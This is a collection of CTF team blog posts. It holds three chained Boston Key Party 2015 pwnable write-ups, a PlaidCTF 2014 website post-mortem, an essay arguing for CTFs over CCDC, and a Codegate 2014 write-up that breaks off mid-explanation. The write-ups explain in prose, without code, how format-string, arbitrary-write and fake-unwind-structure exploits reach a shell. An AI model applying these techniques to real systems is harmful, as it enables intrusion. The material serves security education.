[bkpCTF-2015] braintree (tz) write-up

=== If you have any trouble with poor formatting here, you can read the original post at this blog ===

This is a write-up for braintree challenge, which is the last part of 3-chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-center, quincy-adams.

The binaries were packaged into a tar ball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (tz flag) 54.165.91.92 8899

The goal is to get “tz” flag by exploiting the kernel space process.

If you haven’t read the previous write-up for quincy-adams, I strongly recommend you to read before continuing with this one as we will assume knowledge gained from it.

 

As it was mentioned previously, we will be using the same primitive: hypercall #92.

Therefore, we have an arbitrary-write-anywhere primitive. So, the question is “what can we overwrite in tz that will get us an arbitrary code execution?”

We started looking at each of the hypercall handlers in tz.

 

Then, we stumbled upon hypercall #85.

This function seemed like some sort of cleanup (we called it delete_op in our shellcode) function for an object used in tz.
(As I said previously, we didn’t do much of reversing on tz as we did for uspace and kspace)

It seems like the first argument (v3) is a word that represents id of some sort, but the important thing is that we can control its value. v2 is an offset to the tz data structure, and the value at tz_space + v2 (where v2 is 0) is 0.

Since NX is enabled on tz, we decided to overwrite the GOT entry to execute system. Since the addresses are randomized, we first need to leak an address to calculate the address of system. We are going to abuse the hypercall #92 to do 3 things:

  • Leak out libc address, so we can calculate the address of system.
  • Overwrite free (.got.plt in tz) with &system.
  • Overwrite contents in v4 + 8 (aka, tz_space + 8) with a pointer to our command buffer.

However, doing all of these comes with a price. The size limit (256 bytes) starts to become an issue here. We can either put another stager in the middle to allow us more space, or optimize our payload such that it fits under 256 bytes! We chose to do latter :P

At first, we were over ~10 bytes, but once we have “optimized” a little bit, we finally got our payload to be 254 bytes!

Note that we are not using the same shell.asm as before (our new payload is now called shell.asm). However, we can continue to use the same stage1.asm and the python script from kspace exploit. For convenience sake, it is also attached here.

 

We have abused the hypercall #92 (encrypt) to exploit both kspace and tz, but there may be another way to exploit kspace without going through the hypervisor.

Well, that’s it for the 3-parts pwnable challenge write-up =)

Thank you for reading, and happy hacking!

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

[bkpCTF-2015] quincy-adams (kspace) write-up

=== If you have any trouble with poor formatting here, you can read the original post at this blog ===

This is a write-up for quincy-adams challenge, which is the second part of 3-chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-center, braintree.

The binaries were packaged into a tar ball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (kspace flag) 54.165.91.92 8899

The goal is to get “kspace” flag by exploiting the kernel space process.

 

Before we dive in, let’s look at what is really going on.

We can think of each process (tz, kspace, uspace) as a separate privilege ring, as their name suggest.

  • tz (TrustZone?) – a “hypervisor” layer that implements the “hypercalls” (we haven’t really reversed this too much).
  • kspace – a kernel layer that implements the “syscalls”; it maintains the files array and performs the actual tasks such as listing files, removing files, sleeping, and cat’ing (open & read).
  • uspace – a user layer that implements the interface that the user interacts with; it parses the commands and calls the appropriate “syscalls”.

We would start from the uspace to get an arbitrary code execution on uspace process (as we did in previous write-up), then exploit the kspace to allow us to perform an attack against tz. Shared memory is arranged by tz, such that each layer will get its own memory “space” to pass the arguments to {sys, hyper}calls.

kspace syscall_handler (sub_401180)

 

We can see that the syscall numbers, which is stored on user_space[0], match with what we saw on uspace.

  • do_ls loops through the file_array list and prints out the name of the file.
  • do_rm finds the file in file_array with a given filename, and deletes it.
  • do_create adds a file into file_array up to 16 files. It looks for the spot/bin in the array by checking if the filename is null.
    This also initializes the file structure:

    • open_file, read_file, and delete_file are the function pointers.

      file struct

  • Note that syscall 95 and 99 are sleep and exit, respectively, which are not that interesting :p
  • do_read finds the file in file_array with a given filename, and if the file is “open”, its content is copied to the output buffer (2nd argument).
  • do_open finds the file in file_array with a given filename, and changes its open state.
    • Only up to 9 files can be open simultaneously.

There is a bug with file creation and deletion, where the number of files in the list gets incremented when creating a file, but it does not get decremented when being deleted. Thus, we can only create up to 16 files and we can’t create any more file even if we delete some. This didn’t really affect the exploitation, however :)

If you followed carefully, you’d have noticed that we didn’t go over the mysterious syscall 92 (sub_402380).

This operation, unlike other ones, does not process the user input/arguments here. Instead, it forwards these arguments to tz via the “hypercall”.

syscall 92 (kspace)

 

To be more precise, the 3 arguments are stored starting at kernel_space + 48, and the hypercall takes 3 arguments of the hypercall number (92), 0, and the pointer to the arguments (kernel_space + 48).

So what does this hypercall do? Let’s take a look at tz binary now.

hypercall handler (tz)

As we can see above, sub_401560 is the hypercall 92 handler.
It doesn’t really do anything too fancy. The function performs a very simple “encryption” of data.

hypercall 92 handler

 

It basically xor‘s the bytes at src with the key “charlestown isn’t that skeytchy.” and stores the result to dest.

There is no restriction on the memory address for dest (other than checking if it’s 0x100000000), which allows us to do arbitrary (xor) write. By preparing the src buffer with already xor’d values, we can write any value we want to any memory location.

So, we can use this capability(?) to write useful data structure (such as a function pointer) to gain arbitrary code execution!

Just like uspace, kspace has NX disabled, so we can put our shellcode somewhere and jump to it.

 

The attack plan is as follows:

  1. Create a file, with the content being the shellcode we want to run as kernel.
  2. Overwrite a function pointer (open_file) for the first file (which is the one that we just created in step 1) with the pointer to our shellcode.
    • The file_array is located at kernel_space + 0x3E800 == 0x90003e800.
    • According to our struc_files struct, file_array + 0x8 points to the files array.
    • Thus, the first file structure will be located at 0x90003e808 and according to our struc_file, its content is located at the offset +0x9.
    • The first file’s content == shellcode == 0x90003e800 + 0x8 + 0x9 == 0x90003e811.
    • The first file’s open_file function pointer is at +0x118 from the file structure, which makes its location 0x90003e920.
  3. Invoke a syscall #93, which opens a file.
    • At this point, we will tell it to open our file which has corrupted open_file function pointer — thus, calling into our shellcode.

Note that since we are using syscal #92 (encrypt) to perform an arbitrary write to memory, we have to “encrypt” the value we want to write beforehand such that it will get “decrypted” when it writes. The filename we used is “lol”.

Our exploit code looks fairly similar, but we now create a file called ‘lol’ first with the shellcode. (The shellcode is the same as what we used for uspace.)

Then, we trigger the bug with our stage1 code.

 

So far, we have triggered a uspace bug to call a syscall (92) in kspace, which does a hypercall (92) in tz, which allowed us to perform an arbitrary memory write in kspace memory.

Amusingly, we will be using the same primitive to get a shell under tz context in the next series.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

[bkpCTF-2015] quincy-center (uspace) write-up

=== If you have any trouble with poor formatting here, you can read the original post at this blog ===

This is a write-up for quincy-center challenge, which is the first part of 3-chained pwnable challenge from Boston Key Party CTF last weekend. You can read about the other parts here: quincy-adams, braintree.

The binaries were packaged into a tar ball.

The MBTA wrote a cool system. It’s pretty bad though, sometimes the commands work, sometimes they don’t…
Exploit it. (uspace flag) 54.165.91.92 8899

The goal is to get “uspace” flag by exploiting the user space process.

Looking at the output of file , these are all x86_64 binaries.

Opening up in IDA Pro, we see that  sub_401470 has the process loop that prompts “bksh> ” like a shell environment.

bksh (uspace) command line parser

 

First, we see that there are semaphore locking/unlocking for I/O operations, which don’t seem to be too important at the moment. Then, the code to parse the command follows.

The general scheme for how the system works will be explained in the next series (kspace), so we will leave out the details of how things are implemented and maintained for now. Understanding the operations (create, list, remove, etc.) abstractly is good enough for exploiting the user space :)

There are total of 6 commands it understands: ls, create, rm, cat, sleep, and exit.

  • ls – lists files on the system
  • create – creates a new file on the system
  • rm – deletes a file on the system
  • sleep – sleep…
  • exit – exits the shell

Let’s look at what create does for us.

The function takes the first argument to the command as a file name, and reads 256 bytes from the user for the content of the file that is being created. The buffer that is being read is large enough, so there’s no overflow here. Then, it “calls” into the kernel “syscall” (via shared memory) with the syscall number 96 and its two arguments (file name & contents buffer). Everything seems normal and sane, so we move on.

create syscall (from uspace to kspace)

 

Looking through more functions, we find a vulnerable code in cat, where it uses sprintf with the file contents buffer as its format string (aka trivial buffer overflow).

“cat” operation (open syscall followed by read syscall)

 

v12 is a stack buffer of size 256 bytes, and it’s located bp-0x118. Also, we noticed that the NX was disabled on this binary, so we could easily jump to our buffer (such as one of our arguments for the command). Conveniently, the pointers to our arguments are on the stack, so we can do a simple pop/pop/ret gadget to get an arbitrary code execution :D

We have successfully got a shell as uspace user.
(Note that since the challenge servers are down, the exploitation is shown in a local setup.)

Once we have arbitrary code running on uspace, we can then perform syscalls that are exposed by the kernel, but not available through a user-space interface (such as syscall number 92, shown below).

kspace syscall handler

The analysis of kspace & tz will be continued on the next post.

 

Write-up by Cai (Brian Pak) [https://www.bpak.org]

 

PlaidCTF 2014 – Website post-mortem

First, we would like to thank everyone for participating in PlaidCTF 2014. Thanks to all of you, this year was bigger than ever with over 850 teams partcipating and 3 sponsors (THANK YOU!) providing $14K in cash prizes and covering all of our operating costs. Congratulations go out to 0xffa, Dragon Sector, and MoreSmokedLeetChicken for finishing in 1st, 2nd, and 3rd. We hope everyone had a lot of fun with the challenges and maybe learned a thing or two, as well.

Now, as everyone who played pCTF this year noticed, things got off to a very rocky start. This was very disappointing for us because we spent a lot of time this year building a simpler interface that would be more usable and, we hoped, more stable. It turns out that we had a few mistakes materialize during the CTF, some nastiness with a particular WSGI server, and more teams than ever before.

The first issue that came up was with our frontend / caching server. Like previous years, we used nginx to serve the static files, but unlike previous years, we also used nginx as the caching layer instead of varnish. This turned out to be a fatal error because nginx does not support the standard Vary HTTP header, which is used by the backend to distinguish between pages that should be cached based on the cookie and those that should not. As such, all pages were cached without the cookie which meant a user might see a different team’s page instead of their own. As a quick fix, we added the cookie header to the cache key, but now all of the pages that we thought would be regenerated once per second needed to be regenerated once per second per team. And as I will discuss later, we had a lot of teams.

The second issue, and the one that ended up consuming a lot of our time and causing the most frustration, was a strange interaction between nginx and gunicorn. This year we stuck to a pretty standard setup: django + gunicorn + nginx. Unfortunately, due to high load, or other factors that we are still unaware of, gunicorn was hanging on a recvfrom call on its socket. The problem mysteriously fixed itself a couple hours into the competition, but then came back an hour or so later. At that point, we started replacing parts of our infrastructure (e.g. nginx -> Apache, gunicorn -> uwsgi). The working setup ended up being uwsgi + nginx, but it took us a couple of hours to get to this point. Now, the backend worker processes were no longer hanging and the website was mostly working except for some load issues.

As I mentioned above, we had more teams this year than ever before with over 850 teams solving the trivial sanity check key. Once the nginx caching was working properly, we found that we were still overloaded during the voting phases so we brought up another copy of the www server and used an Elastic Load Balancer as the new frontend. I would like to thank Amazon for making its load balancer very easy to setup, use, and monitor. After this, all load issues were resolved and the website continued to be stable for the rest of the competition. We lost IP address information for the majority of the competition because we were not logging the X-Forwarded-For header, but that was a small price for having a working website.

Requests per minute processed by the Elastic Load Balancer

Requests per minute processed by the Elastic Load Balancer

There were two other bugs in the game logic that we fixed over the course of the 48 hours. The first one was an issue with the database transactions in Django. The default isolation level for the postgresql database backend was “Read Committed” which resulted in transaction interleaving and allowing teams to submit the same key multiple times. We resolved the issue by changing the isolation level and enforcing uniqueness of (team_id,problem_key_id) in the database. The other issue was related to the “chance” tiles. During the first half of the competition, it was impossible for the “chance” tile to return something besides “Unlucky!” Once we resolved the problem, we changed the probabilities to compensate for the lost attempts.

All in all, we think the competition went well and we thank everyone for their patience. Every year we try to do something a bit different to keep things interesting and with that comes some untested infrastructure. I assure you that we continue to learn from these mistakes and will continue to work hard to improve the competition for next year.

– awesie on behalf of PPP

Why CTF

A recent blog post has been going around talking about the differences between competitions like CCDC (Collegiate Cyber Defense Competition) and CTFs (Capture the Flag). It’s a good read and I thought a lot of interesting points were brought up, and figured it could be beneficial to try to respond to them some place to encourage discussion (and besides, our blog needs any excuse it can get for new content). For what it’s worth, I didn’t watch Chris Eagle’s presentations, though I imagine I don’t agree with everything he said. Likewise, I don’t disagree with everything from Matt Weeks’ blog post. This post is mostly motivated by the fact that while a discussion on security competitions is going, it makes sense to talk about some related things I have been thinking about.

First off, as many of you probably know, the Plaid Parliament of Pwning has not played in purely defensive exercises. To those that may say “well aren’t you going to be biased towards capture the flag events?”, I answer “almost certainly”. I’m not going to say CCDC is worthless and CTFs are the epitome of security education, but my claim is that CTFs provide a much better platform and environment for players learning about a broad range of security topics. Further, I’m going to use the term CCDC when I suppose in general I mean “defensive security competition”. This probably means I will muddle some specific details.

1. Problem Solving

Fundamentally, CTFs are about problem solving. Although I know defensive competitions have many problems that their competitors have to deal with, I believe CTFs intrinsically allow for more “out of the box” thinking. Let’s start with rules. Most CTF competitions are pretty loose in this respect: maybe team size is limited, challengers aren’t allowed to share answers, and attacking game infrastructure is forbidden, but that’s about it. The nature of defensive competitions means they can’t be so simple. Although the rules for CCDC aren’t too bad, the rule book for the CyberPatriot competition is over one hundred pages long. There’s a reason for this: there are “easy solutions” that would break these competitions. What if you block malicious network blocks? set up a honey pot? rewrite services to be bug free? delete user accounts only the red team is using? proxy all traffic through an IPS? upgrade Windows XP boxes to Windows 7? run separate services in sandboxes?

Yes, not all of these options are feasible in the real world in every scenario: they may be expensive, or constrained by some other resources. But what is the lesson here? If you are put in a real world situation, do all these solutions become blocked just like in a competition? Of course not! You need to evaluate the merits and consequences of each one and decide for yourself. In most defense competitions, these decisions are made for you, and that limits your abilities to think out of the box. In many cases teams that succeed at CCDC do so because they manage to get as out of the box as possible. This ends up meaning they “game the game” rather than make good security practices. For example, maybe you aren’t allowed to delete users on a system, because in the real world that would restrict the abilities of legitimate users to access the system. Fine, change all their passwords to a 100 character hex string. The real world value of this isn’t any better, but it is more acceptable to do in CCDC.

In a Capture the Flag contest, just about anything goes. Over the years I’ve seen crazy hacks to get things working and working quickly: dumping memory by patching in a jump to MessageBox, reverse image searching to find plausible ECC bits for broken QR codes, forcing a core dump and using a file carver to extract files from obfuscated programs… The type of thinking and problem solving promoted by CTFs is fundamental to what it means to be a security researcher.

2. Feedback

When reading through some comments about the CCDC post, I came across someone complaining about the lack of transparency in CCDC. Although this may not be a universally held opinion, it doesn’t apply to Capture the Flag events. Let’s look closely at the procedure for earning points in both:

  1. Solve problem
  2. Submit problem to score server
  3. Observe scoreboard add points or not

Scoring system in CTF

  1. Maintain service uptime and fend off the Red Team
  2. Complete “injects” (business tasks)
  3. Write reports documenting injects and attacks
  4. Submit reports to organizers to get points,reduce deductions
  5. Wait until end of competition to see final standings

Scoring system in CCDC

 

 

 

 

 

 

 

 

Okay, so why is this important? First, scoring in a CTF is objective–there are no reports to be read and graded, and instant feedback to verify the system works correctly. What this means is CTF problem solving can be an iterative process: attempt a solution in a particular way, see the results, and modify your behavior accordingly. If you read about the importance of feedback in learning, you’ll notice a few things CTFs do right: feedback is immediate, feedback is individual (both on a problem and team basis), and feedback isn’t final (if you get a flag wrong, try, try again).

Let’s contrast this with a defense competition. Feedback is not immediate at all: sometimes a team standing is updated daily, and sometimes not until the end of the competition! Feedback is not granular: your team might get a final score at the end of the competition, but it’s not clear where your points came from. Even if points are broken down by advisories, SLA, and so forth, it’s not clear which actions are being re-enforced. Finally, feedback isn’t iterative. Although you may be able to fill out a form to request a regrade on a report, you can’t just submit a bunch of reports and use the best one.

One might argue: the real world doesn’t provide immediate feedback, isn’t objective, and isn’t always fair, so defense competitions are a better approximation of real scenarios! There is a lot of truth to this: CTFs aren’t depicting day-to-day scenarios of system administrators or work in a security operations center. But you know what? That’s kind of the whole point, and what makes CTFs fun.

3. Fun

I’ll admit outright, “fun” is clearly not universal. I know people out there thinks blocking exploits is far more fun than throwing them, but let’s be honest, this isn’t a popular opinion. Heck, even the NCCDC website talks about how much cooler the Red Team is than the contestants. Again, “well the real world isn’t always fun”. Fine. But if your goal is to encourage people to learn and try new things, is the best way to do it really to throw them into the middle of a hostile network, or would it be better to give them fun tasks that guide them through the learning process?

From the NCCDC website

Red teaming sure sounds a lot more fun than “getting OWNED”

Jeopardy style CTFs are a lot of fun. They’re relaxing, you sit down and solve problems. Does this emulate high stress-real world scenarios in hostile networks? No, but that’s not a fun learning environment. DefconCTF is not a place for beginners. I am not sure how someone could argue that a teaching method that is less fun could ever be superior.

Of course, not all people like breaking things. That’s fine. Capture the Flags aren’t always about binary exploitation. There are plenty of forensics, programming, cryptography, and other skills that involve building things. The only skills that CCDC has which I have not seen in a CTF are writing reports and running updates. Looking for backdoors and malicious software, finding intrusions in log files, changing default settings and modifying web applications are all things that have shown up in CTFs (though I admit those aren’t the kind of tasks that I enjoy).

4. The “1%”

One of the points that struck me on the blog post regarding CCDC was the idea of appealing to the “1%”. Restated simply, the claim is that CCDC makes use of skills that 99% of security workers will use while CTFs really only teach 1% of relevant skills. The numbers aren’t really important here, but the sentiment is. Skills like writing reports, reviewing log files, and running updates are the sort of skills most “security workers” will use. Blech. What is that really saying? To get a job as a security worker I don’t need to understand ASLR bypass techniques, NTFS alternate data streams, or CBC Padding Oracle attacks? Yes, that is probably true! That writing a report is more valuable than understanding modern offensive security? Perhaps! But personally, I think that if CCDC claimed the reason it is a superior platform to CTFs is because it involves writing more reports and running Windows update, people would start losing interest. Why not just participate in a technical writing contest? Do we really need a contest which stresses the most mundane aspects of security?

It is probably worth mentioning that some CTFs also require contestants write up solutions. In one instance of RuCTF (2009), players could receive points for patches or writeups of vulnerabilities. Many CTFs with prizes or final rounds also require a writeup be submitted from teams that place. Some competitions also give separate prizes for highest points/first to complete challenges, and best writeup. Still, I think it is fair to say that writing reports is stressed much more in CCDC than CTF events, for better or for worse.

The fact of the matter is that students wanting to learn security are told they should participate in competitions like CCDC. And sure, security is heavily involved in these competitions, but not at the same level as in CTFs. If someone wants to learn about security, I think it’s pretty clear a CTF is a better avenue than a defensive contest. This is important to me because I often come across people who want to get jobs in security and so they play in CCDC. Although I think it’s wonderful for them to take that initiative, I can’t help but feel that their time would be much better spent playing a CTF.

One thing I have heard oft repeated which I whole-heartedly agree with is that in defense, you are always playing catch up. Unless you think as an attacker, you can only react to known vulnerabilities, and so you are always a step behind. The CCDC approach seems to be to focus on defense, and to succeed you will probably learn something about attacks; the CTF approach is that you should focus on attacks, as the defense comes naturally afterwards. I would posit that the top CTF players would be better suited to defending a network against advanced attackers than the top CCDC players for precisely this reason.

Aside from all this, I think everyone would be much safer if security professionals knew more about the 1% that they so rarely see. Maybe if the person reading the IDS logs knew more about writing polymorphic shellcode than what is in Metasploit, they’d be better prepared to prevent threats more advanced than someone using Shikata ga nai.

5. Conclusion

Both CCDC and CTFs address different goals. As far as I can tell, CCDC’s goal is to assess how well someone can administrate and document systems, while CTFs focus on teaching security. Both of these have their place. But telling fledgling security professionals the better way to learn is through CCDC seems dishonest, and forces them into a niche they might not enjoy. Although the skills taught in CTFs are not always used day-to-day, they cover a far broader range of security topics that are relevant to anyone working in the security field. As someone who tries to promote the value of CTFs, it’s important to me that those interested in security education recognize that CTFs are an incredibly powerful and should be encouraged where possible.

-tylerni7

Codegate 2014: membership (800pt pwnable) write-up

This is a write-up for 800 point pwnable challenge called ‘membership’ from Codegate CTF 2014 Pre-qual round. PPP was the only solver for this challenge during the competition, so I have decided to do a write-up for the challenge. Enjoy.  (awesie and ricky solved it during the competition.)

=== If you have any trouble with poor formatting here, you can read the original post at this blog ===

1. Challenge overview

You can download the copy of the binary here.
During the competition, we could ssh into one of their machines to exploit and read the flag.

membership_problem

As you can see, it’s a 32-bit ELF binary. So, let’s open it up in IDA and start reversing.

The program looks really simple. It just installs a couple signal handlers (specifically for SIGSEGV and SIGFPE) and calls a main (interesting) function, where it prompts us for the userid and password. Then, the program calculates SHA256 hash of the given password and compares with the stored hash. If the password hashes do not match, a runtime error exception is thrown and the program is aborted. If we pass in the correct password, we get a shell :)

Since guessing the correct password or cracking the hash is not viable option for us, we try to locate some other bugs that can be useful.

As highlighted above, the program dereferences a null pointer (*0 = 0) if the length of the password is greater than or equal to 16 bytes. Obviously it is going to trigger SIGSEGV, but do you remember what we said earlier about installing the signal handlers? And yes, one of them was SIGSEGV handler.

So, instead of crashing it miserably, the handler will be called.
Let’s examine what this handler does.

SIGSEGV handler installer

Now, if we look at the SIGSEGV_handler, we may think it doesn’t really do anything useful.
Note that it just fills up exception information and calls __cxa_throw to throw exception.

At this point, we could go on and explain what SIGFPE_handler does as well, but we’ll skip it since it’s not that interesting and is not needed for a successful exploitation.
You may ask… so, what’s left?

 

2. Vulnerability

Notice that this is a C++ program with exception throwing. We should check how C++ exception handling works.

It uses a thing called, DWARF, which is a standardized debugging data format for unwinding the stack and handling exceptions.

There was a CTF problem in the past that involved DWARF (called Khazad from Ghost in the Shellcode 2012): Check out these write-ups if you are interested!

Anyways, you can find DWARF information can be displayed by using binutils such as objdump or readelf:

Take a close look at the entry with “pc=08048fa7..0804904d”.
This entry basically describes what should happen when the exception is thrown between that PC range. Note that the SIGSEGV_handler throws an exception at 0x0804901A , which is in that range (that range is precisely  SIGSEGV_handler function).

Ok. Now, we have to make sense of what all those operations mean :)
DW_CFA_val_expression contains CFA expressions that are defined here.

Luckily, it’s not that hard to understand the expressions. We can simply think of it as a stack machine:

So, in short, it checks if the username is “stdchpie” and the password[2:5] is equal to “\xb1\x2e\x40″.
If any of the condition fails, it transfers execution to 0x8048f18 , which does exit(0) .

What happens if we satisfy the conditions? Good question.
It basically dumps us to the following code:

This code prints out “nested” string and writes password[5:9] to *password[1:5]. Meaning, we get to write anything in 0x402eb1??  address space with any 4 byte value we choose. 4-byte write is pretty strong tool in exploitation, but when we are limited to 256 byte range, it’s difficult to make it useful. Also, it immediately jumps to 0x8048cc0 , where it does another null pointer dereference causing SIGSEGV to happen — thus, we get infinite ‘nested’ string printed out.

Alright. Let’s summarize what we know and have so far.

  1. We can trigger a null pointer dereference, causing SIGSEGV handler to get executed (and thus, DWARF CFA expressions), by sending a password that’s >= 16 bytes.
  2. With carefully constructed password, we can overwrite any 4-byte value to any address in between 0x402eb100  and 0x402eb1ff .

The natural question is, then, what is mapped on that memory address?
With ulimit -s unlimited ,

As we can see above (highlighted), the address range falls into libgcc‘s memory — specifically, it matched portion of its .bss section.

So, what is there in libgcc_s.so.1, you ask.

Precisely, this.
And that’s it.

At this point, we downloaded and opened up libgcc source code to look at where some of these data structures are used, and tried to look for ways to get an EIP control.

So the journey begins.

3. libgcc source code analysis

Note that this step took the longest since we had to actually understand part of the gcc code when it does stack unwinding and handling the exception.

You can download the source for gcc here (gcc-4.8.1, Ubuntu 13.01).

During the competition, we chose each data structure of interest and traced backwards to find out whether by controlling said structure we can influence anything (e.g. function pointer) on callers while handling exceptions to hijack the control flow.

Since we now know which one can be used to control EIP, we will start from there: frame_hdr_cache_head is our target. [It is very well be possible to solve the challenge with different method/structure, but this is the one that we ended up using during the CTF.]

If we locate the place that frame_hdr_cache_head is referenced, we land in the middle of _Unwind_IteratePhdrCallback function in libgcc/unwind-dw2-fde.dip.c.

frame_hdr_cache_head points to the first element of a singly linked list that contains frame_hdr_cache_element(s).
The code iterates through the list and finds the entry for data->pc  in cache. data->pc  is the program counter of the frame we are trying to handle the exception for.

This cache is filled in as the program discovers exception handler frames (eh_frame).

The following is the struct definition for frame_hdr_cache_element:

So, if we control where frame_hdr_cache_head points to, we can also construct/control the elements inside. Before we dive into what happens when we find an element in the cache and ‘goto found‘, let’s step back for a minute and see if we can even get to here and what that allows us to do.

The function we just looked at (_Unwind_IteratePhdrCallback) is called from _Unwind_Find_FDE in unwind-dw2-fde-dip.c.
Then, _Unwind_Find_FDE function is called from uw_frame_state_for function in unwind-dw2.c.
uw_frame_state_for function is called from _Unwind_RaiseException function in unwind.inc, which provides an interface to raise an exception given an exception object.

Where does _Unwind_RaiseException get called, then?
It gets called by __cxa_throw, and if you remember, our SIGSEGV_handler invokes this function to raise an exception.

Alright. We now have confirmed that we can get to that code by causing the binary to throw an exception and letting libgcc unwinds/handles the exception.

But is there anything interesting in this code path such that we can give us EIP control? Yes.

Let’s review _Unwind_RaiseException a little bit:

Notice the highlighted lines. What do you see?

A function pointer getting called! And we *may* be able to control fs.personality .
Let’s find out!

Remember that the struct pointer that we are interested in tracing is fs (aka 2nd argument).
Wee see here that _Unwind_Find_FDE is used to get fde (which is used to get cie), and extract_cie_info takes cie and fs as its first and third argument, respectively.

So, what happens in extract_cie_info?

Cool.
extract_cie_info parses cie and updates fs->personality . We’ll work out the details later.

Okay, now, we have to look into _Unwind_Find_FDE function to find out what it returns (fde) is:

As we discussed earlier, _Unwind_Find_FDE calls _Unwind_IteratePhdrCallback, which fills the data struct.
Then, it returns data.ret.

Whoa. After that chain of functions, we now came back to where we started — _Unwind_IteratePhdrCallback.
Warning: This is a really long function :p

To show a good idea of the call stack, here’s a diagram:

Fortunately, we do not have to look at all of its details. As we learned earlier, the cache for eh_frame_hdr is looked up and the following is performed in case the entry was found:

Note that data->ret  is set to f on line 415, where f is a FDE pointer found by performing binary search.
Comments from unwind-dw2-fde.h briefly describes FDE & CIE lookup:

Let’s review some of the primitive structs and functions that are used in above code to get a better understanding of what’s going on. We will make references to these as we explain the code later.

And, these are some functions that are used when parsing data:

That was a lot of stuff, but don’t worry about understanding/remembering all of them since we will go over the logic at somewhat high-level.

When an exception is thrown, the PC is looked up to find a correct FDE for the current function.

  1. First, they search the shared library cache linked-list (which we control the head pointer).
  2. Once the entry is found, they get unw_eh_frame_hdr (hdr variable) by adding p_vaddr and load_base. Then, they make sure the version of hdr is 1.
    • hdr also contains the flags for encoding schemes for eh_frame_ptr, fde_count, and table.
    • Encoding flag is defined in unwind-pe.h, but important ones are: DW_EH_PE_pcrel (0x10, pc-relative), DW_EH_PE_absptr (0x00, absolute),  DW_EH_PE_sdata4 (0x0b, signed 4 byte), DW_EH_PE_udata4 (0x03, unsigned 4 byte).
  3. Parse eh_frame and fde_count
  4. Perform binary search in table for the data->pc  against table[i].initial_loc + data_base , where data_base is hdr.
  5. When found an element in table, set f to table[mid].fde + data_base  (thus, calculating the FDE pointer).
  6. Final check is done by parsing the range to ensure that this FDE record covers data->pc
    ( table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range )
  7. data->ret  is filled with f.

It’s important to carefully construct a (fake) FDE record since it holds CIE_delta field, which is used to locate the CIE record to be parsed later (for personality function pointer).

Only piece that we haven’t visited yet is extract_cie_info, but we will visit it as we develop an exploit payload :)

4. Exploit development

Finally, we can start writing some evil awesome payload to pwn this binary.

Here’s our plan for the attack:

  1. Overwrite frame_hdr_cache_head (0x402eb118) to point to our stdin buffer (0x40025000 + 0x1c for skipping userid/password/padding).
  2. Construct fake structs:
    • cache_entry (frame_hdr_cache_element)
    • p_eh_frame_hdr (Elf32_Phdr)
    • hdr  (unw_eh_frame_hdr)
    • table (fde_table)
    • fde (dwarf_fde)
    • cie (dwarf_cide)
  3. When creating a fake cie struct, we make the personality function pointer 0x8048E97 , where it does execlp("/bin/sh", "/bin/sh", 0) , and get a shell!!

Note that the some of the fields in structs are relative offsets, so we need to plan where to put things and link them correctly.

4-1. Trigger

Let’s start with a simple payload that would pass the check and trigger the bug.

As we can see in action, this payload triggers the bug and causes infinite SIGSEGV.
We currently chose 0x402eb101 for no particular reason, but we can see that memory is successfully written.

4-2. cache_entry & p_eh_frame_hdr construction

Now, we overwrite frame_hdr_cache_head to point to our stdin buffer.

We are going to start building fake structs from our buffer + 0x1c.

So what values should we use?
To not worry about the search too much, we are going to set pc_low to 0x0 and pc_high to 0xFFFFFFFF. This basically says that this cache entry should be used for any exception thrown in this range of addresses — so we’ll catch everything. Also, to make it easy to do math, we are going to make load_base to 0. Finally, we have to set p_eh_frame_hdr pointer to the fake Elf32_Phdr struct. We will put this fake phdr struct right after our fake cache_entry struct that we are currently building. The rest of the fields are not really used (for our purpose), so we can put dummy values.

This gives us this:

For p_eh_frame_hdr struct, we only care about p_vaddr which is used to calculate hdr (unw_eh_frame_hdr).

Let’s see in action.

So, this payload basically lets us to execute goto found;  code (unwind-dw2-fde-dip.c:225) since the data->pc  will be in between pc_low and pc_high.

Then, on line 315, hdr is calculated by adding p_eh_frame_hdr->p_vaddr and load_base, thus pointing 0x40025054.
Time to build a fake hdr struct!

4-3. hdr & table construction

Starting at +0x54 from our buffer comes the hdr struct.
It’s a 4 byte struct and we fill in reasonable values here, according to the encoding scheme mentioned above.

Then, as we saw earlier, eh_frame is read. Since the value is supposedly encoded with  (DW_EH_PE_pcrel | DW_EH_PE_sdata4) , this value in our data should be an offset from where the hdr is. However, the value of eh_frame isn’t really related to what we do, so we can put any value (read_encoded_value_with_base actually does the calculation given the base to correctly compute eh_frame’s value).

Ok, next check is the following:

We have picked the values for encoding schems such that we satisfy both conditions.
Then, fde_count is read.
Since we do not want to create more than one set of fake structs (to be searched with binary search later), we will force this to be 1.

So with this data appended, we so far have this as our payload:

Then, the table comes next. fde_table struct has two fields: initial_loc and fde.

As mentioned earlier, in order for the search to succeed, we need to satisfy  table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range .

Note that data_base is pointing at hdr (0x40025054). So we can set initial_loc to 0xBFFDAFAC such that initial_loc + data_base == 0x40025054 + 0xBFFDAFAC  == 0x0 .

Also, the fde field is actually an (signed) offset from hdr — due to (DW_EH_PE_datarel | DW_EH_PE_sdata4) encoding. So, we set it to 0x14 to indicate that our fake dwarf_fde struct will be located at 0x40025068.

Fake hdr and table construction is done, and we now have this:

The current payload, when fed to the program, will result in a crash since it will read an invalid value for the range.
To make data->pc < initial_loc + data_base + range  true, we need to construct a fake dwarf_fde now.

4-4. fde & cie construction

As a final step, we are going to construct fde and cie records in our payload.

dwarf_fde struct has length, CIE_delta, and pc_begin fields (followed by fde_augmentation length, which should be 0).

We are going to make the length 0x1C, and CIE_delta to 0xFFFFFFE4 (such that &CIE_delta - CIE_delta == 0x40025088 — this will be explained later). We will set pc_begin to 0x0 (doesn’t really matter what we put here).

What comes after pc_begin is the range. To explain a little bit, on line 412 in unwind-dw2-fde-dip.c, range is read from f->pc_begin[f_enc_size] where f_enc_size is 4, making the 4 byte right after pc_begin be the range. Since we made the init_loc to be 0x0, we will make the range to be 0xFFFFFFFF. Then, we pad the last few bytes (so, technically we can fix the length, but that’s what we used during the competition).

